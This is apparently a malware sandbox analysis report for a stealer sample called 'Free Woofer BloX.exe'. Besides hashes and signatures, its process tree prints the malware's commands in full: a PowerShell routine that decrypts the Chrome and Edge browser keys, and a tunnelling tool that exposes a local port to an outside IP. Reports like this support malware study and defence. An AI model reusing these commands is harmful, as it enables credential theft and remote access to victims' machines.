Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

3

Free Woofer BloX.exe

windows7-x64

1

Free Woofer BloX.exe

windows10-2004-x64

7

Resubmissions

23/07/2023, 15:02

230723-settlaed65 7

23/07/2023, 14:39

230723-r1ar6sed22 7

Analysis

  • max time kernel
    138s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/07/2023, 14:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Free Woofer BloX.exe

  • Size

    39.2MB

  • MD5

    793c4da2d66ae4a3175432265b716f3b

  • SHA1

    87f69e5d036ec2d1dca2c7348b5d336d38b17d84

  • SHA256

    5b4e3c99b1366492acdcac0ab08721125a1f29e60d654d7d26904fad6a28616f

  • SHA512

    34702eaaf3530fcc065b5d3809cc7beb6c09c30abc248abc08c29247507dbec2fb47698d6a1d10045c2240eb7c6574ef3ae7acaba5224618873067681026765c

  • SSDEEP

    393216:f1Du8BtuBw2FEL3Z3aLUoQvo6LP/SgbSpYvKEh1EdKwlGQKPJuGsiTfREsrgCYfP:fMguj8Q4VfvUqFTrYPV

Score
7/10
spywarestealer

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Free Woofer BloX.exe
    "C:\Users\Admin\AppData\Local\Temp\Free Woofer BloX.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -c "$ShowWindowAsyncCode = '[DllImport(\"user32.dll\")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' $ShowWindowAsync = Add-Type -MemberDefinition $ShowWindowAsyncCode -name Win32ShowWindowAsync -namespace Win32Functions -PassThru $hwnd = (Get-Process -PID $pid).MainWindowHandle if ($hwnd -ne [System.IntPtr]::Zero) { # When you got HWND of the console window: # (It would appear that Windows Console Host is the default terminal application) $ShowWindowAsync::ShowWindowAsync($hwnd, 0) } else { # When you failed to get HWND of the console window: # (It would appear that Windows Terminal is the default terminal application) # Mark the current console window with a unique string. $UniqueWindowTitle = New-Guid $Host.UI.RawUI.WindowTitle = $UniqueWindowTitle $StringBuilder = New-Object System.Text.StringBuilder 1024 # Search the process that has the window title generated above. $TerminalProcess = (Get-Process | Where-Object { $_.MainWindowTitle -eq $UniqueWindowTitle }) # Get the window handle of the terminal process. # Note that GetConsoleWindow() in Win32 API returns the HWND of # powershell.exe itself rather than the terminal process. # When you call ShowWindowAsync(HWND, 0) with the HWND from GetConsoleWindow(), # the Windows Terminal window will be just minimized rather than hidden. $hwnd = $TerminalProcess.MainWindowHandle if ($hwnd -ne [System.IntPtr]::Zero) { $ShowWindowAsync::ShowWindowAsync($hwnd, 0) } else { Write-Host \"Failed to hide the console window.\" } }"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3248
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0iyczact\0iyczact.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4248
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE4E2.tmp" "c:\Users\Admin\AppData\Local\Temp\0iyczact\CSCBE47E27C649F435391FBA4319F3E468.TMP"
          4⤵
            PID:4512
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -c "Get-Process | where {$_.Description -like '*Cpp_Runtime_Env*'} | select Description"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5112
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "%windir%\System32\REG.exe QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\REG.exe QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
          3⤵
            PID:2440
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get name"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4784
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic logicaldisk get name
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3544
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get name"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2816
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic logicaldisk get name
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1260
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get name"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1772
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic logicaldisk get name
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2984
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /d /s /c "start /b cmd /c C:\Users\Admin\AppData\Local\Temp\bore.exe local 6801 --to 213.232.235.54 --secret pskandcodingguythekings"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3548
          • C:\Windows\system32\cmd.exe
            cmd /c C:\Users\Admin\AppData\Local\Temp\bore.exe local 6801 --to 213.232.235.54 --secret pskandcodingguythekings
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1720
            • C:\Users\Admin\AppData\Local\Temp\bore.exe
              C:\Users\Admin\AppData\Local\Temp\bore.exe local 6801 --to 213.232.235.54 --secret pskandcodingguythekings
              4⤵
              • Executes dropped EXE
              PID:2704
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -c "Add-Type -Assembly System.Security;$ExtensionFile = \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\"; $jsondata = Get-Content -Raw -Path $ExtensionFile | ConvertFrom-Json; $encKey = [System.Convert]::FromBase64String($jsondata.os_crypt.encrypted_key.ToString()); $encKey = $encKey[5..$encKey.Length]; $decKey = [System.Security.Cryptography.ProtectedData]::Unprotect($encKey,$null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $body = $decKey -join \", \" | Out-String;echo $body;"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4836
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -c "Add-Type -Assembly System.Security;$ExtensionFile = \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State\"; $jsondata = Get-Content -Raw -Path $ExtensionFile | ConvertFrom-Json; $encKey = [System.Convert]::FromBase64String($jsondata.os_crypt.encrypted_key.ToString()); $encKey = $encKey[5..$encKey.Length]; $decKey = [System.Security.Cryptography.ProtectedData]::Unprotect($encKey,$null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $body = $decKey -join \", \" | Out-String;echo $body;"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2532

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        556084f2c6d459c116a69d6fedcc4105

        SHA1

        633e89b9a1e77942d822d14de6708430a3944dbc

        SHA256

        88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

        SHA512

        0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        20810d165c316378abc650cfa1e8d26a

        SHA1

        1e93a79cbb16e8836bc669ecbff8bd614b8fd05b

        SHA256

        06131bf4d4fe55b1f4bbc16d84a994b1b0891d4459bc1c5b05a8cec3725ebb27

        SHA512

        58fc8a24e40ab9051739ee47d99d69a24bf0ec1755a507b13fd76df47395c97a140aa56f1f4de3a0fc848216fc6f32c7e191aa862848c65226eba5c3697aa098

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        20810d165c316378abc650cfa1e8d26a

        SHA1

        1e93a79cbb16e8836bc669ecbff8bd614b8fd05b

        SHA256

        06131bf4d4fe55b1f4bbc16d84a994b1b0891d4459bc1c5b05a8cec3725ebb27

        SHA512

        58fc8a24e40ab9051739ee47d99d69a24bf0ec1755a507b13fd76df47395c97a140aa56f1f4de3a0fc848216fc6f32c7e191aa862848c65226eba5c3697aa098

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        ed4a65523911b88ad19b33db4e07c5a7

        SHA1

        90d9f05efc74e7a83c9e38fe65249b15db1fa7c9

        SHA256

        0b149e2aa1f69cecd85f3925d3d133b2042c3ca50200bb177511ef0bf53acb64

        SHA512

        aae02c5b9bb4fe06c54ff8f1951a9521815c4c04d29914c06c6e9e25e824cd4778786c453445668f8abce3a7c063f5cb37d7f1fb9b4256663827273c4017bea8

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\0iyczact\0iyczact.dll
        Filesize

        3KB

        MD5

        0729e206ab1d642c5db14b360fb6f577

        SHA1

        c8bfb52135d01f2735770324035e1543c5d9484a

        SHA256

        0adbbbc446799d803006e1d543d5ae2a7f9701754a0a62c4b9a6418b8da98f2e

        SHA512

        559e7e618c8b16b1e674f10c2be25956eda3af5c17e33cd300d79a70ba40fdb4cc28a3a83ebd7c4ad2a150890efb9d7c8a1e89a68fc39e7afbb1be34009e4c58

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RESE4E2.tmp
        Filesize

        1KB

        MD5

        6bea95f3ad20a4f9f1c2c18cb7f778ed

        SHA1

        5a43a6422d14e8dfc426896eb5ba0da9b52e706f

        SHA256

        e117377e5a5dab7febd3660780ba8b9a126e2528bec1260210e9002f80aa2036

        SHA512

        9b14c3841bbd193fcc0f9f09d1903f131e438d5eb07786b2f6844a9f73d00663368f9dbfb68ff35276325f48c1de6eb17e9d67243f1ba3e10cc9dde08ae84733

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xzhftsq0.44u.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\bore.exe
        Filesize

        1.5MB

        MD5

        9528c4a629beb2a08cf8d8d2afd1c225

        SHA1

        3aa4e4186ae41e84f744767989368c0f81efe43b

        SHA256

        0bfd38c590e56144552813c3d97c52093544d0a031c42666368424b3d23a9405

        SHA512

        8647ef473adace9c82e4ff5cd4890dcd2e3e28a9d6bb489dbbaa2d9c259792837ef94374835dc099f4312a8f1e8c22d7b7bc3546470835f7a6192ebf66cb7dad

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\bore.exe
        Filesize

        1.5MB

        MD5

        9528c4a629beb2a08cf8d8d2afd1c225

        SHA1

        3aa4e4186ae41e84f744767989368c0f81efe43b

        SHA256

        0bfd38c590e56144552813c3d97c52093544d0a031c42666368424b3d23a9405

        SHA512

        8647ef473adace9c82e4ff5cd4890dcd2e3e28a9d6bb489dbbaa2d9c259792837ef94374835dc099f4312a8f1e8c22d7b7bc3546470835f7a6192ebf66cb7dad

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        6KB

        MD5

        f3fc3d7202820a6a9f45d2da74c9936c

        SHA1

        a2bba2ce294a3f2f7d82691e6121c7a4912a5252

        SHA256

        bc2294e4ab383dc373dacdb4e3e01c38753954ceab6c149b6930c982e4e0697e

        SHA512

        23cdb617b4b7244c4f919ebd09b62b2bfdefffe6c8916df2bec6953818c84310acc9fb0bd017ea2c08abfd23ae344d189f9559704b839c8d8cd699ce939223de

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        6KB

        MD5

        0c21f886fc200fd0e25f1cf32975336a

        SHA1

        88e518d731de30e84905816052f500d131fc6f81

        SHA256

        a00b5cb4bce87c8130fd9730f3b618fd8d2f63c25ffcd05a2f965270dd1e0007

        SHA512

        2e0a2c0261541f07d1cdb246d6c0481e135fa0eebbd16de232028aca4a72afcbc9ee2214bcd555e8d698f2e0296dc112af9fe8900a78cb6b57609c7b5a7b3511

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        6KB

        MD5

        0c21f886fc200fd0e25f1cf32975336a

        SHA1

        88e518d731de30e84905816052f500d131fc6f81

        SHA256

        a00b5cb4bce87c8130fd9730f3b618fd8d2f63c25ffcd05a2f965270dd1e0007

        SHA512

        2e0a2c0261541f07d1cdb246d6c0481e135fa0eebbd16de232028aca4a72afcbc9ee2214bcd555e8d698f2e0296dc112af9fe8900a78cb6b57609c7b5a7b3511

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        6KB

        MD5

        df271192885336b844a815192a62b486

        SHA1

        26f8a2190b642fa8ba925d99429d2d2abdc4cff1

        SHA256

        c685ccad62f2f74b162d61998daef9c4df4cc05497cebdbd590656005f426d46

        SHA512

        0485c274b69240e194025b1a8ae76bf6fcc2b86589291acfeb2560e9b6de3d9002e6ccf299f36c549cb64a5eaa04dfd7edf2d1df441fb5e658d07e2b44898c48

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        6KB

        MD5

        df271192885336b844a815192a62b486

        SHA1

        26f8a2190b642fa8ba925d99429d2d2abdc4cff1

        SHA256

        c685ccad62f2f74b162d61998daef9c4df4cc05497cebdbd590656005f426d46

        SHA512

        0485c274b69240e194025b1a8ae76bf6fcc2b86589291acfeb2560e9b6de3d9002e6ccf299f36c549cb64a5eaa04dfd7edf2d1df441fb5e658d07e2b44898c48

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        6KB

        MD5

        a00a2fa3cf576ba595c0238d5e5baf81

        SHA1

        55a98019eb430317bf26cfad3fa94295a3b4c965

        SHA256

        15e2114a5d711df524c9923ac8fbfbe04b8cd6315319c4fed2cb620228c033f2

        SHA512

        a6983db37816bc0213471e03538f8449d6aa5c9a960b03835f4efcf79e5bf3ec07ffad641d302d9e34fb41651e3ecf788ac4267988f52f446c73035546338b5d

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\0iyczact\0iyczact.0.cs
        Filesize

        237B

        MD5

        a6e80541a483188dbce2f3d843fcbe4d

        SHA1

        a1f2e13a3314ab6a676751936c7b3b9a9fb9103e

        SHA256

        d5b10c7f3cbb62cbf4772a7b178c578c8abaa3fe9a7420decbff18d81f08ccd9

        SHA512

        6f60f86688dc256a668b6e3e8529820cf8253c47c6a1126f3097576f36b5c220f32febabce65e25dfa5b824dc2200b7ca7aca2c3bc3b8314cadb734a589b6337

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\0iyczact\0iyczact.cmdline
        Filesize

        369B

        MD5

        b0ce8c212c31c76fe7e58db525da9d5e

        SHA1

        b494f55f193c5f850348308892a95efba0eb68f3

        SHA256

        bcc9939a0b5ff8ffa7a4c1ce8084e29f23d346739083e79ef1fc13994e92217a

        SHA512

        9533dde302b3b172e525455bed59109ce96b0b0e0b560a6971f7bb0f590f833e322e5e2fa7da6e64232b7ee5a82db14893859da3093588be757b0b9f174590c6

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\0iyczact\CSCBE47E27C649F435391FBA4319F3E468.TMP
        Filesize

        652B

        MD5

        a1bd953a3879614ae6effc2ca7c19751

        SHA1

        dc51fbfd5f8a88dfc7e1b6231d130fdc8e9f3825

        SHA256

        87ca7d6af0da4e9aa18b17e60cc83169dbbdcf42de2af857b6c7f35d59228a26

        SHA512

        c4ee06d5b73bd040c932f0407b077ed783b2cda885a642fc07e825456d050b2f13eaddc9097cfb729d0023ce2ca4515165ad430b48b5dba7532d7d0cf79f4049

        Download Submit

      • memory/2532-253-0x0000012767350000-0x0000012767360000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2532-249-0x00007FFA2FEA0000-0x00007FFA30961000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2532-256-0x00007FFA2FEA0000-0x00007FFA30961000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2532-250-0x0000012767350000-0x0000012767360000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2532-251-0x0000012767350000-0x0000012767360000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3248-167-0x00000212F6F40000-0x00000212F6F50000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3248-168-0x00000212F6F40000-0x00000212F6F50000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3248-190-0x00007FFA2FEA0000-0x00007FFA30961000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3248-147-0x00000212DECF0000-0x00000212DED12000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3248-162-0x00007FFA2FEA0000-0x00007FFA30961000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3248-163-0x00000212F6F40000-0x00000212F6F50000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3248-183-0x00000212F6F40000-0x00000212F6F50000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4836-221-0x000002505C980000-0x000002505CEA8000-memory.dmp

        Filesize

        5.2MB

        Download

      • memory/4836-220-0x000002505C280000-0x000002505C442000-memory.dmp

        Filesize

        1.8MB

        Download

      • memory/4836-224-0x00007FFA2FCB0000-0x00007FFA30771000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4836-219-0x000002505C060000-0x000002505C0B0000-memory.dmp

        Filesize

        320KB

        Download

      • memory/4836-208-0x0000025059BA0000-0x0000025059BB0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4836-207-0x0000025059BA0000-0x0000025059BB0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4836-206-0x00007FFA2FCB0000-0x00007FFA30771000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/5112-198-0x00007FFA2FEA0000-0x00007FFA30961000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/5112-166-0x0000024FA7640000-0x0000024FA7650000-memory.dmp

        Filesize

        64KB

        Download

      • memory/5112-164-0x00007FFA2FEA0000-0x00007FFA30961000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/5112-165-0x0000024FA7640000-0x0000024FA7650000-memory.dmp

        Filesize

        64KB

        Download